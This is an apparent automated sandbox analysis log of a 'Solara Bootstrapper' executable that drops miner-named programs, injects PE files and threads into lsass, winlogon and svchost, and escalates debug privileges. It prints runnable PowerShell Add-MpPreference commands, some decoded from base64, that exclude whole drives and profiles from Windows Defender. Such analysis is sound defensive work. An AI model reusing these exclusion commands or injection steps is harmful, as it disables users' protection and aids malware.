Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\conhost.exe	Code function: 2_2_0000019A4980DCE0 FindFirstFileExW,	2_2_0000019A4980DCE0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 15_2_000001F43C54DCE0 FindFirstFileExW,	15_2_000001F43C54DCE0
Source: C:\Windows\System32\winlogon.exe	Code function: 53_2_000001E8589BDCE0 FindFirstFileExW,	53_2_000001E8589BDCE0
Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140AE86DCE0 FindFirstFileExW,	68_2_00000140AE86DCE0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599715	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599575	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598935	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598820	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598246	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598117	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\dialer.exe	API call chain: ExitProcess graph end node			graph_46-413
Source: C:\Windows\System32\dialer.exe	API call chain: ExitProcess graph end node			graph_63-468

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Code function: 2_2_0000019A4980D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_0000019A4980D2A4

Source: C:\Windows\System32\conhost.exe

Code function: 2_2_0000019A49801BF4 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

2_2_0000019A49801BF4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Code function: 0_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,	0_2_004014D1
Source: C:\Windows\System32\conhost.exe	Code function: 2_2_0000019A4980D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0000019A4980D2A4
Source: C:\Windows\System32\conhost.exe	Code function: 2_2_0000019A49807D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0000019A49807D90
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Code function: 4_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,	4_2_004014D1
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 15_2_000001F43C547D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001F43C547D90
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 15_2_000001F43C54D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001F43C54D2A4
Source: C:\Windows\System32\winlogon.exe	Code function: 53_2_000001E8589B7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	53_2_000001E8589B7D90
Source: C:\Windows\System32\winlogon.exe	Code function: 53_2_000001E8589BD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	53_2_000001E8589BD2A4
Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140AE867D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	68_2_00000140AE867D90
Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140AE86D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	68_2_00000140AE86D2A4

Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 1E858950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 1E858980000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 140ADFC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 195DD590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 1160CB90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 257E1070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F28C1D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CA97FD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D2652E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 254A27C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24B87DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 205FB3C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A205670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 18EC1F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 25CE3BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26238950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2786E560000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1611FF70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 27C0F350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B279570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E70A460000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22D13110000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22C8C580000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2825F1D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20BAEC90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C782530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: A60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24066EB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 181CEDB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A142790000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 195B6F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1428DAD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DBFA550000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D76CCC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A239D90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17CFA390000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FB7270000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DF53B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 164E88A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 25177B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 28D5D340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 24EB5E10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20859990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F153C20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D241D40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 16FADAD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 20E03070000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15204DB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: 3050000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 175C5280000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22EF1B30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 261DE4D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 226D8930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13E5E930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 27234C50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 28543540000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 2B684340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2364AE20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 19AF2590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 232885B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C3732E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1EB58D40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 29DD77B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 19A497D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F43C510000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1AB883E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1AB88E70000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,

46_2_0000000140001C88

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5898273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: ADFC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DD59273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CB9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E107273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8C1D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 97FD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 652E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A27C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 87DA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FB3C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 567273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C1F3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E3BC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3895273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6E56273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1FF7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F35273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7957273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A46273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1311273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8C58273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5F1D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5D9C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AEC9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DC1B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8253273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 66EB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FD9A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CEDB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4279273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B6F3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8DAD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7383273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FA55273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6CCC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 39D9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FA39273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B727273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 53B5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E88A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 77B5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5D34273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B5E1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5999273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 53C2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 41D4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: ADAD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 307273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4DB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 305273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C528273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 76AA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F1B3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F34B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DE4D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7447273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A9D0273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AF8C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D893273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5E93273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4412273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 97E3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DC87273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 698D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 34C5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4354273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8434273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5892273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4AE2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F259273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 885B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 732E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 58D4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D77B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 497D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3C51273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 883E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 88E7273C

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process created: Base64 decoded <#iub#>Add-MpPreference <#vqw#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#dmx#> -Force <#bfi#>
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process created: Base64 decoded <#dpt#>Add-MpPreference <#apt#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#njg#> -Force <#hnq#>
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process created: Base64 decoded <#iub#>Add-MpPreference <#vqw#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#dmx#> -Force <#bfi#>	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process created: Base64 decoded <#dpt#>Add-MpPreference <#apt#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#njg#> -Force <#hnq#>	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E858980000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1160CB90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 254A27C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
